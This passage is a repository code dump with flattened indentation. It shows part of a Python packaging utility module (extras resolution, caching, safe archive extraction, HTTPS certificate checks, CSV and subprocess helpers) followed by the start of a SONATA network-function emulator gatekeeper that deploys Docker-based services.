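#     parse_name_and_version('Foo-Bar (1.0.post1)')  ->  ('foo-bar', '1.0.post1')
# Anything not matching that shape raises DistlibException.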
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if "*" in requested:
requested.remove("*")
result |= available
for r in requested:
if r == "-":
result.add(r)
elif r.startswith("-"):
unwanted = r[1:]
if unwanted not in available:
logger.warning("undeclared extra: %s" % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning("undeclared extra: %s" % r)
result.add(r)
return result
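# Illustrative behaviour of the extras resolution above (hypothetical sets):
#     get_extras(['*', '-tests'], ['docs', 'tests'])  ->  {'docs'}
#     get_extras(['docs', 'unknown'], ['docs'])       ->  {'docs', 'unknown'}
# A warning is logged for the undeclared 'unknown' extra, but it is still kept.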
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
ct = headers.get("Content-Type")
if not ct.startswith("application/json"):
logger.debug("Unexpected response for JSON request: %s", ct)
else:
reader = codecs.getreader("utf-8")(resp)
# data = reader.read().decode('utf-8')
# result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception("Failed to get external data for %s: %s", url, e)
return result
_external_data_base_url = "https://www.red-dove.com/pypi/projects/"
def get_project_data(name):
url = "%s/%s/project.json" % (name[0].upper(), name)
url = urljoin(_external_data_base_url, url)
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = "%s/%s/package-%s.json" % (name[0].upper(), name, version)
url = urljoin(_external_data_base_url, url)
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base): # pragma: no cover
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning("Directory '%s' is not private", base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError("No subscribers: %r" % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish an event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception("Exception during event publication")
value = None
result.append(value)
logger.debug(
"publish %s: args = %s, kwargs = %s, result = %s",
event,
args,
kwargs,
result,
)
return result
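# Minimal usage sketch for EventMixin (illustrative, names are hypothetical):
#     class Notifier(EventMixin):
#         pass
#     n = Notifier()
#     n.add('built', lambda event, name: 'built %s' % name)
#     n.publish('built', 'mypkg')  # -> ['built mypkg']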
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError: # pragma: no cover
raise ValueError("%r not a successor of anything" % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError: # pragma: no cover
raise ValueError("%r not a successor of %r" % (succ, pred))
def is_step(self, step):
return step in self._preds or step in self._succs or step in self._nodes
def get_steps(self, final):
if not self.is_step(final):
raise ValueError("Unknown: %r" % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
# http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node], lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node], index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node:
break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ["digraph G {"]
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(" %s -> %s;" % (pred, succ))
for node in self._nodes:
result.append(" %s;" % node)
result.append("}")
return "\n".join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = (".tar.gz", ".tar.bz2", ".tar", ".zip", ".tgz", ".tbz", ".whl")
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode("utf-8")
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError("path outside destination: %r" % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith((".zip", ".whl")):
format = "zip"
elif archive_filename.endswith((".tar.gz", ".tgz")):
format = "tgz"
mode = "r:gz"
elif archive_filename.endswith((".tar.bz2", ".tbz")):
format = "tbz"
mode = "r:bz2"
elif archive_filename.endswith(".tar"):
format = "tar"
mode = "r"
else: # pragma: no cover
raise ValueError("Unknown format for %r" % archive_filename)
try:
if format == "zip":
archive = ZipFile(archive_filename, "r")
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != "zip" and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode("utf-8")
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ("", "K", "M", "G", "T", "P")
class Progress(object):
unknown = "UNKNOWN"
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = "100 %"
elif self.max is None:
result = " ?? %"
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = "%3d %%" % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = "??:??:??"
# elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime("%H:%M:%S", time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = "Done"
t = self.elapsed
# import pdb; pdb.set_trace()
else:
prefix = "ETA "
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
# import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return "%s: %s" % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return "%d %sB/s" % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r"\{([^}]*)\}")
_CHECK_RECURSIVE_GLOB = re.compile(r"[^/\\,{]\*\*|\*\*[^/\\,}]")
_CHECK_MISMATCH_SET = re.compile(r"^[^{]*\}|\{[^}]*$")
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(","):
for path in _iglob("".join((prefix, item, suffix))):
yield path
else:
if "**" not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split("**", 1)
if prefix == "":
prefix = "."
if radical == "":
radical = "*"
else:
# we support both
radical = radical.lstrip("/")
radical = radical.lstrip("\\")
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
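# Examples of the extended glob syntax supported above (hypothetical paths):
#     iglob('src/**/*.py')             # recursive match below 'src'
#     iglob('docs/{api,guide}/*.rst')  # brace alternation over 'api' and 'guide'
# A '**' that is not used on its own between separators raises ValueError.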
if ssl:
from .compat import (
HTTPSHandler as BaseHTTPSHandler,
match_hostname,
CertificateError,
)
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, "_tunnel_host", False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, "SSLContext"):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(
sock,
self.key_file,
self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs,
)
else: # pragma: no cover
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(ssl, "OP_NO_SSLv2"):
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, "HAS_SNI", False):
kwargs["server_hostname"] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug("Host verified: %s", self.host)
except CertificateError: # pragma: no cover
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if "certificate verify failed" in str(e.reason):
raise CertificateError(
"Unable to verify server certificate " "for %s" % req.host
)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError(
"Unexpected HTTP request on what should be a secure "
"connection: %s" % req
)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host="", port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
if ssl:
class HTTPS(httplib.HTTPS):
def __init__(self, host="", port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
if ssl:
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs["timeout"] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None, **kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop("timeout", None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get("use_datetime", 0)
if scheme == "https":
tcls = SafeTransport
else:
tcls = Transport
kwargs["transport"] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += "b"
else:
kwargs["newline"] = ""
# Python 3 determines encoding from locale. Force 'utf-8'
# file encoding to match other forced utf-8 encoding
kwargs["encoding"] = "utf-8"
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
"delimiter": str(","), # The strs are used because we need native
"quotechar": str('"'), # str in the csv API (2.x won't take
"lineterminator": str("\n"), # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if "stream" in kwargs:
stream = kwargs["stream"]
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader("utf-8")(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs["path"], "r")
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode("utf-8")
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, "w")
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode("utf-8")
r.append(item)
row = r
self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters["inc"] = "inc_convert"
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if "()" in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop("()")
if not callable(c):
c = self.resolve(c)
props = config.pop(".", None)
# Check for valid identifiers
args = config.pop("[]", ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and "()" in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, "r", encoding="utf-8") as f:
result = json.load(f)
return result
class SubprocessMixin(object):
"""
Mixin for running subprocesses and capturing their output
"""
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write(".")
else:
sys.stderr.write(s.decode("utf-8"))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs
)
t1 = threading.Thread(target=self.reader, args=(p.stdout, "stdout"))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, "stderr"))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress("done.", "main")
elif self.verbose:
sys.stderr.write("done.\n")
return p
def normalize_name(name):
"""Normalize a python package name a la PEP 503"""
# https://www.python.org/dev/peps/pep-0503/#normalized-names
return re.sub("[-_.]+", "-", name).lower()
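# Example of PEP 503 normalization (illustrative):
#     normalize_name('Foo__Bar.Baz')  ->  'foo-bar-baz'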
dummygatekeeper.py
# Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
import logging
import os
import uuid
import hashlib
import zipfile
import yaml
import threading
from docker import DockerClient
from flask import Flask, request
import flask_restful as fr
from collections import defaultdict
import pkg_resources
from subprocess import Popen
from random import randint
import ipaddress
import copy
import time
from functools import reduce
logging.basicConfig()
LOG = logging.getLogger("sonata-dummy-gatekeeper")
LOG.setLevel(logging.DEBUG)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
GK_STORAGE = "/tmp/son-dummy-gk/"
UPLOAD_FOLDER = os.path.join(GK_STORAGE, "uploads/")
CATALOG_FOLDER = os.path.join(GK_STORAGE, "catalog/")
# Enable Dockerfile build functionality
BUILD_DOCKERFILE = False
# flag to indicate that we run without the emulator (only the bare API for
# integration testing)
GK_STANDALONE_MODE = False
# should a new version of an image be pulled even if it is already available
FORCE_PULL = False
# Automatically deploy SAPs (endpoints) of the service as new containers
# Attention: This is not a configuration switch but a global variable!
# Don't change its default value.
DEPLOY_SAP = False
# flag to indicate if we use bidirectional forwarding rules in the
# automatic chaining process
BIDIRECTIONAL_CHAIN = False
# override the management interfaces in the descriptors with default
# docker0 interfaces in the containers
USE_DOCKER_MGMT = False
# automatically deploy uploaded packages (no need to execute son-access
# deploy --latest separately)
AUTO_DEPLOY = False
# and also automatically terminate any other running services
AUTO_DELETE = False
def generate_subnets(prefix, base, subnet_size=50, mask=24):
# Generate a list of ipaddress in subnets
r = list()
for net in range(base, base + subnet_size):
subnet = "{0}.{1}.0/{2}".format(prefix, net, mask)
r.append(ipaddress.ip_network(unicode(subnet)))
return r
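# Illustrative call (Python 2, matching the usage below):
#     generate_subnets('10.10', 0, subnet_size=2, mask=30)
#         -> [IPv4Network(u'10.10.0.0/30'), IPv4Network(u'10.10.1.0/30')]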
# private subnet definitions for the generated interfaces
# 10.10.xxx.0/30
SAP_SUBNETS = generate_subnets('10.10', 0, subnet_size=50, mask=30)
# 10.20.xxx.0/24
ELAN_SUBNETS = generate_subnets('10.20', 0, subnet_size=50, mask=24)
# 10.30.xxx.0/30
ELINE_SUBNETS = generate_subnets('10.30', 0, subnet_size=50, mask=30)
# path to the VNFD for the SAP VNF that is deployed as internal SAP point
SAP_VNFD = None
# Time in seconds to wait for vnf stop scripts to execute fully
VNF_STOP_WAIT_TIME = 5
class Gatekeeper(object):
def __init__(self):
self.services = dict()
self.dcs = dict()
self.net = None
# used to generate short names for VNFs (Mininet limitation)
self.vnf_counter = 0
LOG.info("Create SONATA dummy gatekeeper.")
def register_service_package(self, service_uuid, service):
"""
register new service package
:param service_uuid
:param service object
"""
self.services[service_uuid] = service
# lets perform all steps needed to onboard the service
service.onboard()
def get_next_vnf_name(self):
self.vnf_counter += 1
return "vnf%d" % self.vnf_counter
class Service(object):
"""
This class represents a NS uploaded as a *.son package to the
dummy gatekeeper.
Can have multiple running instances of this service.
"""
def __init__(self,
service_uuid,
package_file_hash,
package_file_path):
self.uuid = service_uuid
self.package_file_hash = package_file_hash
self.package_file_path = package_file_path
self.package_content_path = os.path.join(
CATALOG_FOLDER, "services/%s" % self.uuid)
self.manifest = None
self.nsd = None
self.vnfds = dict()
self.saps = dict()
self.saps_ext = list()
self.saps_int = list()
self.local_docker_files = dict()
self.remote_docker_image_urls = dict()
self.instances = dict()
# dict to find the vnf_name for any vnf id
self.vnf_id2vnf_name = dict()
def onboard(self):
"""
Do all steps to prepare this service to be instantiated
:return:
"""
# 1. extract the contents of the package and store them in our catalog
self._unpack_service_package()
# 2. read in all descriptor files
self._load_package_descriptor()
self._load_nsd()
self._load_vnfd()
if DEPLOY_SAP:
self._load_saps()
# 3. prepare container images (e.g. download or build Dockerfile)
if BUILD_DOCKERFILE:
self._load_docker_files()
self._build_images_from_dockerfiles()
else:
self._load_docker_urls()
self._pull_predefined_dockerimages()
LOG.info("On-boarded service: %r" % self.manifest.get("name"))
def start_service(self):
"""
This methods creates and starts a new service instance.
It computes placements, iterates over all VNFDs, and starts
each VNFD as a Docker container in the data center selected
by the placement algorithm.
:return:
"""
LOG.info("Starting service %r" % self.uuid)
# 1. each service instance gets a new uuid to identify it
instance_uuid = str(uuid.uuid4())
# build an instances dict (a bit like an NSR :))
self.instances[instance_uuid] = dict()
self.instances[instance_uuid]["vnf_instances"] = list()
# 2. compute placement of this service instance (adds DC names to
# VNFDs)
if not GK_STANDALONE_MODE:
# self._calculate_placement(FirstDcPlacement)
self._calculate_placement(RoundRobinDcPlacementWithSAPs)
# 3. start all vnfds that we have in the service (except SAPs)
for vnf_id in self.vnfds:
vnfd = self.vnfds[vnf_id]
vnfi = None
if not GK_STANDALONE_MODE:
vnfi = self._start_vnfd(vnfd, vnf_id)
self.instances[instance_uuid]["vnf_instances"].append(vnfi)
# 4. start all SAPs in the service
for sap in self.saps:
self._start_sap(self.saps[sap], instance_uuid)
# 5. Deploy E-Line and E-LAN links
# Attention: Only done if a "forwarding_graphs" section exists in the NSD,
# even if the "forwarding_graphs" are not used directly.
if "virtual_links" in self.nsd and "forwarding_graphs" in self.nsd:
vlinks = self.nsd["virtual_links"]
# constituent virtual links are not checked
# fwd_links = self.nsd["forwarding_graphs"][0]["constituent_virtual_links"]
eline_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-Line")]
elan_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-LAN")]
GK.net.deployed_elines.extend(eline_fwd_links)
GK.net.deployed_elans.extend(elan_fwd_links)
# 5a. deploy E-Line links
self._connect_elines(eline_fwd_links, instance_uuid)
# 5b. deploy E-LAN links
self._connect_elans(elan_fwd_links, instance_uuid)
# 6. run the emulator specific entrypoint scripts in the VNFIs of this
# service instance
self._trigger_emulator_start_scripts_in_vnfis(
self.instances[instance_uuid]["vnf_instances"])
LOG.info("Service started. Instance id: %r" % instance_uuid)
return instance_uuid
def stop_service(self, instance_uuid):
"""
This method stops a running service instance.
It iterates over all VNF instances, stopping them each
and removing them from their data center.
:param instance_uuid: the uuid of the service instance to be stopped
"""
LOG.info("Stopping service %r" % self.uuid)
# get relevant information
# instance_uuid = str(self.uuid.uuid4())
vnf_instances = self.instances[instance_uuid]["vnf_instances"]
# trigger stop scripts in vnf instances and wait a few seconds for
# completion
self._trigger_emulator_stop_scripts_in_vnfis(vnf_instances)
time.sleep(VNF_STOP_WAIT_TIME)
for v in vnf_instances:
self._stop_vnfi(v)
for sap_name in self.saps_ext:
ext_sap = self.saps[sap_name]
target_dc = ext_sap.get("dc")
target_dc.removeExternalSAP(sap_name)
LOG.info("Stopping the SAP instance: %r in DC %r" %
(sap_name, target_dc))
if not GK_STANDALONE_MODE:
# remove placement?
# self._remove_placement(RoundRobinPlacement)
None
# last step: remove the instance from the list of all instances
del self.instances[instance_uuid]
def _start_vnfd(self, vnfd, vnf_id, **kwargs):
"""
Start a single VNFD of this service
:param vnfd: vnfd descriptor dict
:param vnf_id: unique id of this vnf in the nsd
:return:
"""
# the vnf_name refers to the container image to be deployed
vnf_name = vnfd.get("name")
# iterate over all deployment units within each VNFDs
for u in vnfd.get("virtual_deployment_units"):
# 1. get the name of the docker image to start and the assigned DC
if vnf_id not in self.remote_docker_image_urls:
raise Exception("No image name for %r found. Abort." % vnf_id)
docker_name = self.remote_docker_image_urls.get(vnf_id)
target_dc = vnfd.get("dc")
# 2. perform some checks to ensure we can start the container
assert(docker_name is not None)
assert(target_dc is not None)
if not self._check_docker_image_exists(docker_name):
raise Exception(
"Docker image %r not found. Abort." % docker_name)
# 3. get the resource limits
res_req = u.get("resource_requirements")
cpu_list = res_req.get("cpu").get("cores")
if cpu_list is None:
cpu_list = res_req.get("cpu").get("vcpus")
if cpu_list is None:
cpu_list = "1"
cpu_bw = res_req.get("cpu").get("cpu_bw")
if not cpu_bw:
cpu_bw = 1
mem_num = str(res_req.get("memory").get("size"))
if len(mem_num) == 0:
mem_num = "2"
mem_unit = str(res_req.get("memory").get("size_unit"))
if len(mem_unit) == 0:
mem_unit = "GB"
mem_limit = float(mem_num)
if mem_unit == "GB":
mem_limit = mem_limit * 1024 * 1024 * 1024
elif mem_unit == "MB":
mem_limit = mem_limit * 1024 * 1024
elif mem_unit == "KB":
mem_limit = mem_limit * 1024
mem_lim = int(mem_limit)
cpu_period, cpu_quota = self._calculate_cpu_cfs_values(
float(cpu_bw))
# check if we need to deploy the management ports
intfs = vnfd.get("connection_points", [])
mgmt_intf_names = []
if USE_DOCKER_MGMT:
mgmt_intfs = [vnf_id + ':' + intf['id']
for intf in intfs if intf.get('type') == 'management']
# check if any of these management interfaces are used in a
# management-type network in the nsd
for nsd_intf_name in mgmt_intfs:
vlinks = [l["connection_points_reference"]
for l in self.nsd.get("virtual_links", [])]
for link in vlinks:
if nsd_intf_name in link and self.check_mgmt_interface(
link):
# this is indeed a management interface and can be
# skipped
vnf_id, vnf_interface, vnf_sap_docker_name = parse_interface(
nsd_intf_name)
found_interfaces = [
intf for intf in intfs if intf.get('id') == vnf_interface]
